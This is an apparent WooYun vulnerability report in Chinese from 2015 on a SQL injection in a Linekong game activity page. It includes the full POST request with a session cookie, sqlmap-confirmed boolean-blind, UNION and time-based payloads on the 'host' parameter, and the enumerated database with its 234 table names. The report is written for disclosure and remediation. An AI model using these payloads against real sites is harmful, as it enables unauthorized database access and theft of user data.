乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-22: 细节已通知厂商并且等待厂商处理中 2015-05-25: 厂商已经确认,细节仅向厂商公开 2015-06-04: 细节向核心白帽子及相关领域专家公开 2015-06-14: 细节向普通白帽子公开 2015-06-24: 细节向实习白帽子公开 2015-07-09: 细节向公众公开
蓝港科技《西游记》sql注入注入第四弹
继续来帮你们找漏洞啦。。本来又提交了一个第四弹的。。没想到没被通过啊。。从新又找了一个,这个注入应该没人找到吧。。直接给出测试的数据包:
POST /activity/superMM/_do_selectplayer.ajax.php HTTP/1.1Host: xy.linekong.comProxy-Connection: keep-aliveContent-Length: 11Accept: text/html, */*Origin: http://xy.linekong.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://xy.linekong.com/activity/superMM/note.phpAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: pgv_pvi=5389347840; PHPSESSID=pcii8pkinj9i8kn5qni54ucrp7; pgv_si=s4919567360; __utmt=1; page_hash=3a88ff73c7ca815ea74c7e7295fa7788; __utma=105338506.1099027272.1432191841.1432191841.1432191841.1; __utmb=105338506.25.10.1432191841; __utmc=105338506; __utmz=105338506.1432191841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)host=601022
host参数存在注入。。。
POST parameter 'host' is vulnerable. Do you want to keep testing the others (ifany)? [y/N] nsqlmap identified the following injection points with a total of 41 HTTP(s) reqests:---Place: POSTParameter: host Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: host=601022' AND 3034=3034 AND 'nVzN'='nVzN Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: host=601022' UNION ALL SELECT NULL,CONCAT(0x7170716a71,0x646b6e6464447707478,0x7170787871),NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: host=601022' AND SLEEP(5) AND 'oNSa'='oNSa---[16:04:20] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.11
然后看看数据库:
[*] information_schema[*] xy_web
然后表:
Database: xy_web[234 tables]+--------------------------------------------+| xy_act_oldgame_log || xy_act_prize_log || xy_act_prize_log_20131224 || xy_activity_10wan || xy_activity_10wan_card || xy_activity_10wan_info || xy_activity_10wan_info2nd || xy_activity_10wan_lottery || xy_activity_20100815 || xy_activity_20100815_info_log || xy_activity_20100815_netpas_code_log || xy_activity_20100815_taobao_invite || xy_activity_20100815_taobao_sales || xy_activity_20100815_taobao_sales_log || xy_activity_2011midautumn_ecard || xy_activity_2011midautumn_items || xy_activity_2011midautumn_userinfo || xy_activity_300wan || xy_activity_6gift_getlog || xy_activity_6gift_log || xy_activity_6gift_sign || xy_activity_activation_log || xy_activity_army_draw_log || xy_activity_army_info || xy_activity_army_member || xy_activity_army_vote_log || xy_activity_armycreate_log || xy_activity_armygetgift_log || xy_activity_back || xy_activity_beautyvote_player || xy_activity_beautyvote_voter || xy_activity_blissfulcard_cdkey || xy_activity_blissfulcard_log || xy_activity_brother_activate_log || xy_activity_brother_code_log || xy_activity_bysf_guestbook || xy_activity_bysf_log || xy_activity_bysf_passport || xy_activity_bysf_question || xy_activity_chit_code || xy_activity_date || xy_activity_date_log || xy_activity_duowanvip_code || xy_activity_duowanvip_log || xy_activity_familybattle_army || xy_activity_familybattle_army_back || xy_activity_familybattle_army_prepare || xy_activity_familybattle_army_prepare_back || xy_activity_familybattle_armychief || xy_activity_familybattle_armychief_back || xy_activity_familybattle_lottery_log || xy_activity_fenliulottery_log || xy_activity_first_cdkey || xy_activity_first_cdkey_state || xy_activity_foyuan_cdkey || xy_activity_foyuan_log || xy_activity_foyuan_message || xy_activity_getchit_log || xy_activity_gg_cdkey || xy_activity_gg_cdkey_state || xy_activity_gh_level || xy_activity_goldeneyes_cdkey || xy_activity_goldeneyes_cdkey_state || xy_activity_goldeneyes_dayinfo || xy_activity_goldeneyes_doublekey || xy_activity_guestbook || xy_activity_hopewall || xy_activity_hopewall_bless || xy_activity_huikui_answer_log || xy_activity_huikui_lottery_log || xy_activity_jh2_log || xy_activity_jh2_member || xy_activity_jh2_taobao || xy_activity_jh2_taobao_log || xy_activity_jh_log || xy_activity_jh_member || xy_activity_jianding_log || xy_activity_jianmianhui || xy_activity_jiaozi_log || xy_activity_joinarmy_log || xy_activity_journey_cdkey || xy_activity_journey_cdkey_state || xy_activity_journey_dayinfo || xy_activity_journey_gc || xy_activity_journey_gc_log || xy_activity_king_log || xy_activity_kingbattle_army || xy_activity_kingbattle_army_prepare || xy_activity_kingbattle_armychief || xy_activity_kingbattle_lottery_log || xy_activity_lostself_code_log || xy_activity_lostself_exchange_log || xy_activity_lostself_transfer_log || xy_activity_lover || xy_activity_lv20_log || xy_activity_lv20_member || xy_activity_lv30_log || xy_activity_lv30_log1 || xy_activity_lv40_card_10 || xy_activity_lv40_card_30 || xy_activity_lv40_log || xy_activity_lv40_member || xy_activity_lv60_log1 || xy_activity_makewishes || xy_activity_makewishes_draw_log || xy_activity_meeting || xy_activity_name_log || xy_activity_namegc_log || xy_activity_neg_player || xy_activity_neg_voter || xy_activity_new_act || xy_activity_newact_itemlog || xy_activity_newlottery || xy_activity_newyear_log || xy_activity_nverguo2 || xy_activity_nverguo_cdkey || xy_activity_nverguo_log || xy_activity_old_player || xy_activity_oldfriends1_gift_log || xy_activity_oldfriends1_verify_inviter || xy_activity_oldfriends_exchange_log || xy_activity_oldfriends_inviter || xy_activity_oldfriends_oldplayer || xy_activity_oldfriends_verify_inviter || xy_activity_opg_card || xy_activity_opg_log || xy_activity_opg_turnround_card || xy_activity_opg_turnround_log || xy_activity_opg_user || xy_activity_package_card || xy_activity_package_card_log || xy_activity_package_gift_log || xy_activity_pagoda_log || xy_activity_people_vote_check || xy_activity_people_vote_log || xy_activity_people_vote_man_log || xy_activity_privilege_card || xy_activity_privilege_log || xy_activity_qb || xy_activity_qb2nd || xy_activity_qb3rd || xy_activity_qb4th || xy_activity_qb5th || xy_activity_qb5th_bak || xy_activity_qixi || xy_activity_qmxscj_card || xy_activity_qmxscj_log || xy_activity_qqlz || xy_activity_qqlz_cdkey || xy_activity_rally_giver || xy_activity_rally_invitee || xy_activity_renzheng_log || xy_activity_rushlevel || xy_activity_shenlian_cdkey || xy_activity_shenlian_cdkey_log || xy_activity_song_log || xy_activity_songfinal_userinfo || xy_activity_songfinal_voteinfo || xy_activity_survey_code || xy_activity_survey_log || xy_activity_survey_question || xy_activity_tequan_card || xy_activity_tequan_log || xy_activity_vote_log || xy_activity_vote_query || xy_activity_welfare_cdkey || xy_activity_welfare_log || xy_activity_welfare_message || xy_activity_wudidong_chongji || xy_activity_wudidong_jifen || xy_activity_xunyou_ge || xy_activity_xunyou_ge_cdkey || xy_activity_xunyou_log || xy_activity_xyl || xy_activity_xyvip_gift_log || xy_activity_xyvip_log || xy_activity_zhailing_cdkey || xy_activity_zhailing_log || xy_activity_zhanbu || xy_activity_zhuanpan || xy_activity_zhuanpan_voucher || xy_activity_zhuanpan_voucher_log || xy_activity_zhufu_bless || xy_activity_zhufu_log || xy_activity_zhufu_lottery || xy_address || xy_article || xy_article_demo || xy_article_inserl || xy_build || xy_channel || xy_columns || xy_comment || xy_demo || xy_download || xy_editors_inserl || xy_flash || xy_grading || xy_group || xy_image || xy_image_inserl || xy_jnh_5173card_log || xy_jnh_gift || xy_jnh_gift_log || xy_jnh_luck || xy_jnh_luck_log || xy_jnh_passport_log || xy_jnh_receive_log || xy_login_game_history || xy_lottery_20100209_state || xy_lottery_count || xy_lottery_log || xy_mall_exchange_log || xy_mall_lottery_log || xy_member || xy_pass_card_list || xy_pass_card_list_log || xy_passportstat || xy_sort || xy_special_like_vote || xy_special_taici_vote || xy_taobao_voucher || xy_taobao_voucher_log || xy_template || xy_types || xy_url || xy_url_inserl || xy_vote || xy_vote_inserl || xy_vote_option || xy_wj_article || xy_wj_article_inserl || xy_wj_image || xy_wj_image_inserl |+--------------------------------------------+
234个表。。赶紧修补吧。。
如上
都送了两次礼物了,能不能说下送的啥礼物啊。。O(∩_∩)O
危害等级:高
漏洞Rank:11
确认时间:2015-05-25 14:33
漏洞已确认,正在联系开发人员处理
暂无
